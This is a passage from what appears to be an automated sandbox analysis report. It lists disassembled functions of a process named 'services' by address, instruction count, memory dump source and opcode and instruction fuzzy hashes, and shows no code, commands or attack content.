                                                                                                                                • Instruction ID: ecc0e809c6d75a5abc1076039cca485ae629de67e7350b8fa8a1d641627ad1e9
                                                                                                                                • Opcode Fuzzy Hash: 1a639783bebf3e9261aee320a41149115ca0cc1d8f6417f8c2dc63d29a789763
                                                                                                                                • Instruction Fuzzy Hash: 3741C631A1EA8D4FDBA5EFA888645F97BF0FF18301F1502BAD44AC31B2DE25A945C741
                                                                                                                                Function 00007FFD9BFE94FC Relevance: .1, Instructions: 146COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 26b1332fa79e8ad56c63b84d63c30659a764271434174d2c3f36debc548ba542
                                                                                                                                • Instruction ID: 046f5878e737a11af5575641bfd1e0d651a98e30b35a48994051c3008e5646d0
                                                                                                                                • Opcode Fuzzy Hash: 26b1332fa79e8ad56c63b84d63c30659a764271434174d2c3f36debc548ba542
                                                                                                                                • Instruction Fuzzy Hash: 2641803090874C8FDB55DFA8C899BEDBBF0FF1A310F1041AAD049D7252DA35A885CB51
                                                                                                                                Function 00007FFD9BE65FC0 Relevance: .1, Instructions: 142COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4ba6ef35c1fed830d7a1fcc4f69ca1790f0a8c673c1a1a18f6c2932ba75d6f67
                                                                                                                                • Instruction ID: f9be355bc5aeb7d3c8f8b011c9c725e86cb23821948e0447ad502889f8146bac
                                                                                                                                • Opcode Fuzzy Hash: 4ba6ef35c1fed830d7a1fcc4f69ca1790f0a8c673c1a1a18f6c2932ba75d6f67
                                                                                                                                • Instruction Fuzzy Hash: 1D415421F1990E8FE7689BA440756BA67A5EF95304F05027EE04EC72D6DE3A79028781
                                                                                                                                Function 00007FFD9BE6B6B7 Relevance: .1, Instructions: 127COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d3c4567639fa4d4fe782c4acd07efb2a8b4b75715c3f3bde84acd1d9ee8a42ea
                                                                                                                                • Instruction ID: f798c8260c7ae88e8531aa2e7e2e3910a0eac0d5edfccdc8dc8e523d4456956e
                                                                                                                                • Opcode Fuzzy Hash: d3c4567639fa4d4fe782c4acd07efb2a8b4b75715c3f3bde84acd1d9ee8a42ea
                                                                                                                                • Instruction Fuzzy Hash: 7741443270C9488FDF5CEB68C4A6EA4B7E1FBA9310B14066AD04EC3192DE31F955CB81
                                                                                                                                Function 00007FFD9BE63A67 Relevance: .1, Instructions: 127COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 979361a50202304a40bd62afe46aef8080d27574edb7ac0584d4146e496ae257
                                                                                                                                • Instruction ID: 542ee57defd13f2e9f1acdbc06e4efe18d6560f3c6109b6bd099f53670581d86
                                                                                                                                • Opcode Fuzzy Hash: 979361a50202304a40bd62afe46aef8080d27574edb7ac0584d4146e496ae257
                                                                                                                                • Instruction Fuzzy Hash: 6641623160C90D8FDF99EF1CC4A6EA5B3E1FBA9310B0445AAD05EC3292DE21F845CB81
                                                                                                                                Function 00007FFD9BFE8307 Relevance: .1, Instructions: 127COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8bf345853d9cfa2914a21bd1f3c78bff755af89faedf4e89ee6e9890c60db973
                                                                                                                                • Instruction ID: 5d22f160aab9b5160ef0f1d23daf280f2ddff4fc88e23621b2fe34bb4cebc290
                                                                                                                                • Opcode Fuzzy Hash: 8bf345853d9cfa2914a21bd1f3c78bff755af89faedf4e89ee6e9890c60db973
                                                                                                                                • Instruction Fuzzy Hash: 9841A03570CA498FDF98EF18D4A5DB4B3E1FB68310B0406AAD04EC3292DE25F841CB91
                                                                                                                                Function 00007FFD9BE62790 Relevance: .1, Instructions: 125COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e62a74b812c8e09059ac587a73dad7d2bd7081c9c18e865f034e24de1a077b75
                                                                                                                                • Instruction ID: 9097ab7d8350d51aa23d6d258daca5b1b5545f9688b606208b5b202299d476ca
                                                                                                                                • Opcode Fuzzy Hash: e62a74b812c8e09059ac587a73dad7d2bd7081c9c18e865f034e24de1a077b75
                                                                                                                                • Instruction Fuzzy Hash: A7410830E1E55ECFEB788A988870AB877A5FF54300F1545BAD04EC71E6DD39BA848B41
                                                                                                                                Function 00007FFD9B7980CB Relevance: .1, Instructions: 123COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b790000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d196713eada72cf89d7836ebd4fa6d08d6b8ddd51318eabf8f5c919af675a2f5
                                                                                                                                • Instruction ID: d7a64d8739f565dd5dffa6545b8c6649b7732ed6fe5f654dcf1302a22ce9ea97
                                                                                                                                • Opcode Fuzzy Hash: d196713eada72cf89d7836ebd4fa6d08d6b8ddd51318eabf8f5c919af675a2f5
                                                                                                                                • Instruction Fuzzy Hash: 48519A74E09A1D8EEBA4DF18C895BE9B7B5EB58301F5042EAD00DE2260DF755AC4CF41
                                                                                                                                Function 00007FFD9BFE1D72 Relevance: .1, Instructions: 122COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c3bd9f28280854c35ea07a0ce8017ffb601b264f2cd5b63bb14f4fa8afc518fd
                                                                                                                                • Instruction ID: 595e7dbdbc92f17691b28baf86ca32b83e6d0c8ebf6aa054632f188c67010129
                                                                                                                                • Opcode Fuzzy Hash: c3bd9f28280854c35ea07a0ce8017ffb601b264f2cd5b63bb14f4fa8afc518fd
                                                                                                                                • Instruction Fuzzy Hash: 96311870A08A1C8FEB54EF98D889BEDBBF0FB59311F10416AD04DD7252DA71A885CB51
                                                                                                                                Function 00007FFD9BE6B761 Relevance: .1, Instructions: 120COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e570b13b7adca4c6b66e28c47e4673e0545244f867d854560ef6c22a33284f32
                                                                                                                                • Instruction ID: ac98e69ff0fee2cfa0ef223b2735891e4f2f7a404ecada674b442ecaa7440683
                                                                                                                                • Opcode Fuzzy Hash: e570b13b7adca4c6b66e28c47e4673e0545244f867d854560ef6c22a33284f32
                                                                                                                                • Instruction Fuzzy Hash: DE31323160C9488FDB5CEF28C4A6E64B7E1FFA9310B1446AAE05EC7192DE25F945CB81
                                                                                                                                Function 00007FFD9BE63B11 Relevance: .1, Instructions: 120COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4e88bdba822779608a33bf25b581fe7cca75ee4164fe885870fa3b9c14cecefa
                                                                                                                                • Instruction ID: ab72f386e3abdf89439700692162ce982d6175c1f599d2f27b5980025600d92f
                                                                                                                                • Opcode Fuzzy Hash: 4e88bdba822779608a33bf25b581fe7cca75ee4164fe885870fa3b9c14cecefa
                                                                                                                                • Instruction Fuzzy Hash: F231933160C94C8FDB9DEF1CC465E64B7E1FBA9310B0446A9D05AC72A2DE21FC44CB81
                                                                                                                                Function 00007FFD9BFE83B1 Relevance: .1, Instructions: 120COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 42d86d239dc6202f73e53f77e55c897f05ca4de72947be9b5cdf2b88103fe17d
                                                                                                                                • Instruction ID: 431d306c91414b47c47adec9c2d50c5ff7b74c948bd697aea937788508dd0924
                                                                                                                                • Opcode Fuzzy Hash: 42d86d239dc6202f73e53f77e55c897f05ca4de72947be9b5cdf2b88103fe17d
                                                                                                                                • Instruction Fuzzy Hash: 7B318F35708A598FDF9DEF18C4A5E64B3E1FB69310B0406AED44AC7292DE25FC41CB91
                                                                                                                                Function 00007FFD9BFE1630 Relevance: .1, Instructions: 118COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ed670fdc247fa8adf1839c4fe7339dea9cb8818b328e01394e734329b15e903f
                                                                                                                                • Instruction ID: 32b9099aba38b77e2e40ec922cca88a2ea848c5edb3885b5909ac2d0e882ac17
                                                                                                                                • Opcode Fuzzy Hash: ed670fdc247fa8adf1839c4fe7339dea9cb8818b328e01394e734329b15e903f
                                                                                                                                • Instruction Fuzzy Hash: A2414A3090968D8FDB95EF68C858AEA7BF0FF29300F0545ABD418C71A2DB35AA54CB41
                                                                                                                                Function 00007FFD9BE6DEB0 Relevance: .1, Instructions: 117COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 319319224e551ada90ceb1beecb0bc5ba082ee5fb7aa3d6949975d2808ab80b1
                                                                                                                                • Instruction ID: 53f234666b1d13cbee95655ad4021730d474cb262680beb162c6cfd21893ec97
                                                                                                                                • Opcode Fuzzy Hash: 319319224e551ada90ceb1beecb0bc5ba082ee5fb7aa3d6949975d2808ab80b1
                                                                                                                                • Instruction Fuzzy Hash: CD414820A1E45E4EE7B9C66484B0AF477A2FF51300F1545BAD44FC71A6CD3A7B859740
                                                                                                                                Function 00007FFD9BE6B6FB Relevance: .1, Instructions: 115COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2f757568546ab65c2a166d90159379884e7f02bcd034bdbc9e0ed4f1047bd348
                                                                                                                                • Instruction ID: 30316a44723c1e2a709b7fd129e902f48314edd3a5e45659f3a17b48590b9070
                                                                                                                                • Opcode Fuzzy Hash: 2f757568546ab65c2a166d90159379884e7f02bcd034bdbc9e0ed4f1047bd348
                                                                                                                                • Instruction Fuzzy Hash: DE31323170C9498FDB5CEF28C4A6EA4B7E1FB69310B1406AAE04AC7192DE25F945CB81
                                                                                                                                Function 00007FFD9BE63AAB Relevance: .1, Instructions: 115COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 316edde573d20402f566ace488d1f970b7d970ec37c77803260b086e8c0f62c8
                                                                                                                                • Instruction ID: ebf14a520ceb327bd4c55d297bfb245a9ef95a51f45a84fc50bc71f9fbdb6673
                                                                                                                                • Opcode Fuzzy Hash: 316edde573d20402f566ace488d1f970b7d970ec37c77803260b086e8c0f62c8
                                                                                                                                • Instruction Fuzzy Hash: 8C31A43160C90D8FDF99EF1CC465EA4B3E2FBA8310B0445A9D01AC72A2DE21FC45CB81
                                                                                                                                Function 00007FFD9BFE834B Relevance: .1, Instructions: 115COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e1b8bf47de30ce735e4554a01a0d750fd35de032c3c29181f156b73db38c85ba
                                                                                                                                • Instruction ID: 2dc4b1defe025d1b239b611d2c52268c4974d2c3d9f28ba62e5d2c71c0e457f9
                                                                                                                                • Opcode Fuzzy Hash: e1b8bf47de30ce735e4554a01a0d750fd35de032c3c29181f156b73db38c85ba
                                                                                                                                • Instruction Fuzzy Hash: 1C31813570CA598FDF99EF18C4A5EB5B3E1FB68310B0406AED44AC7292DE25F841CB91
                                                                                                                                Function 00007FFD9BFE8B8A Relevance: .1, Instructions: 114COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f300d89980eff33cd9d86917ed789025d6af207d0172f7fb813c6e0747093303
                                                                                                                                • Instruction ID: b7a289ebde8a68474677510d89b684ece303a0a0661469eddf5ef7d6ffae83c9
                                                                                                                                • Opcode Fuzzy Hash: f300d89980eff33cd9d86917ed789025d6af207d0172f7fb813c6e0747093303
                                                                                                                                • Instruction Fuzzy Hash: 1541FA60A1F68E8FD776EFA898605B93FF1EF46310B1A02B7D04EC61E2C91969059352
                                                                                                                                Function 00007FFD9BFE34E6 Relevance: .1, Instructions: 113COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ac0c88e5538c5bcf2cfbe8477f99e85ddc969e9b596f82a4fa38f61d5e1bc58b
                                                                                                                                • Instruction ID: d4898d8c7f132deceac2511036df979c6daae929931db788919e79b491a4c8d6
                                                                                                                                • Opcode Fuzzy Hash: ac0c88e5538c5bcf2cfbe8477f99e85ddc969e9b596f82a4fa38f61d5e1bc58b
                                                                                                                                • Instruction Fuzzy Hash: E431F221B1E54B8BEE3A9EA454725BC7780DF61300B1603BEE40E871E6DC0E7A418692
                                                                                                                                Function 00007FFD9BE692DE Relevance: .1, Instructions: 111COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ff219803c497b8b42519e2e08c3be0a690c530c1cd08d3f14285d1b26bfb7984
                                                                                                                                • Instruction ID: 9f88be39a4085fb606606bb40eb4280e8ec760f51b7fd636d0f4daba58902e4a
                                                                                                                                • Opcode Fuzzy Hash: ff219803c497b8b42519e2e08c3be0a690c530c1cd08d3f14285d1b26bfb7984
                                                                                                                                • Instruction Fuzzy Hash: 54311531709A0E8FD764CB64D4A86F977D1FF44321F01067EC54AC79E2CB2AA6458781
                                                                                                                                Function 00007FFD9BFE5BAD Relevance: .1, Instructions: 111COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 688c4c70e2e565e49871befe18358bbb67b5d0aafaf69d00c13ca4c0814a9168
                                                                                                                                • Instruction ID: a6e312758b9246c3100a33c5fd084601f01d2a862eb038337a258dc581da12af
                                                                                                                                • Opcode Fuzzy Hash: 688c4c70e2e565e49871befe18358bbb67b5d0aafaf69d00c13ca4c0814a9168
                                                                                                                                • Instruction Fuzzy Hash: 0A313761B1E64E4BE3385E7C587547977E0EF16310B16067ED4CFC71A2DD1A76024382
                                                                                                                                Function 00007FFD9B7D6A21 Relevance: .1, Instructions: 110COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bb24e556f64340118ffb9c59175fe6f5224c822745a7e0af4884b5a6144d37cc
                                                                                                                                • Instruction ID: c03c816ce456767f334dfee85cdafc5ccc189dc83e6e4b2c9d98c7eb04b0266f
                                                                                                                                • Opcode Fuzzy Hash: bb24e556f64340118ffb9c59175fe6f5224c822745a7e0af4884b5a6144d37cc
                                                                                                                                • Instruction Fuzzy Hash: 25414E70A0960D8FDB58DF84C4A4AECB7F2FF98340F11437AD00AA72A1CB75A945CB40
                                                                                                                                Function 00007FFD9BFE1F48 Relevance: .1, Instructions: 105COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3489c23b271b3fcb3fbe7f45ca2c4563499f3db31bacedde0f94e9a8552e4e4d
                                                                                                                                • Instruction ID: 19cbc8fd689e8f89f12a466f0ea4281ef4f24eb970ad05bc2269f0686689f0cf
                                                                                                                                • Opcode Fuzzy Hash: 3489c23b271b3fcb3fbe7f45ca2c4563499f3db31bacedde0f94e9a8552e4e4d
                                                                                                                                • Instruction Fuzzy Hash: 7731B071E1A54E8FDBA4DFA888615FD77B1FF44300F01067AC40AD71E1EB296A14CB80
                                                                                                                                Function 00007FFD9BFED23A Relevance: .1, Instructions: 99COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cc065110599c35a7bed92c81c36bc88523b8e7ffe28ccca0b80f7d578badd967
                                                                                                                                • Instruction ID: c426f65dd5b4fe9107296e2325f0d3df5b7a24afcc33d032d09edfe41539aae5
                                                                                                                                • Opcode Fuzzy Hash: cc065110599c35a7bed92c81c36bc88523b8e7ffe28ccca0b80f7d578badd967
                                                                                                                                • Instruction Fuzzy Hash: E3313776B0DA4E5FDB68EBA898222B877D1EF55310F05027DC06EC7ED3DD1AA5024381
                                                                                                                                Function 00007FFD9BE6881D Relevance: .1, Instructions: 97COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 19a8450fea9e4cbaff61a8f6e59c835514cc541e25866093173c2b322b5a37b6
                                                                                                                                • Instruction ID: 91ebdbe7de94e9253f3e1cc4b4fd35fa8e19e7dd0fd1342e7753f23eceb7c991
                                                                                                                                • Opcode Fuzzy Hash: 19a8450fea9e4cbaff61a8f6e59c835514cc541e25866093173c2b322b5a37b6
                                                                                                                                • Instruction Fuzzy Hash: AD318D31B19A0E8FDB58DF98C4A1968B7A6FF58314B418139D05EC7692DF25B912CB80
                                                                                                                                Function 00007FFD9BFE8115 Relevance: .1, Instructions: 97COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 888fe7627e13ab83f4238b168ab902d9803400186125efe38fcc373805c3073f
                                                                                                                                • Instruction ID: 48279b188b84cae4a263703859b81a5e55c81fc53e5507eed986dd425926e34f
                                                                                                                                • Opcode Fuzzy Hash: 888fe7627e13ab83f4238b168ab902d9803400186125efe38fcc373805c3073f
                                                                                                                                • Instruction Fuzzy Hash: 97315E30B1A54ECFEB68EF9494615BD77B1FF44300F55027AE40ED22A1CA3E6A409B41
                                                                                                                                Function 00007FFD9BE6B4C5 Relevance: .1, Instructions: 95COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 135d5f0491d42cd157902d6b993a304245265ced06527c862160d7a2176b92ae
                                                                                                                                • Instruction ID: f83503841cac6ae4975b2091a586fee4daa78e41d45cd5071c562f2bc6ddf4cc
                                                                                                                                • Opcode Fuzzy Hash: 135d5f0491d42cd157902d6b993a304245265ced06527c862160d7a2176b92ae
                                                                                                                                • Instruction Fuzzy Hash: 3A315D34E0E94ECFEB68DBA484A65FD7BA6FF54300F510176D50ED21A1DF3A6A408741
                                                                                                                                Function 00007FFD9BE60CA5 Relevance: .1, Instructions: 95COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ab93291f1f5ff3499c985e63de876d1ac2d236585b7561f741d256aca5be477a
                                                                                                                                • Instruction ID: 0a7ffedb0ea0dd11dd3631417d86c8ffc2ae12b76eb9df3a78911b8fc24bb2d3
                                                                                                                                • Opcode Fuzzy Hash: ab93291f1f5ff3499c985e63de876d1ac2d236585b7561f741d256aca5be477a
                                                                                                                                • Instruction Fuzzy Hash: 83212671B0991E8FEB69DBA848612E8B3D1FF55710F450279D05EC32D7EE197D028381
                                                                                                                                Function 00007FFD9BE63875 Relevance: .1, Instructions: 95COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
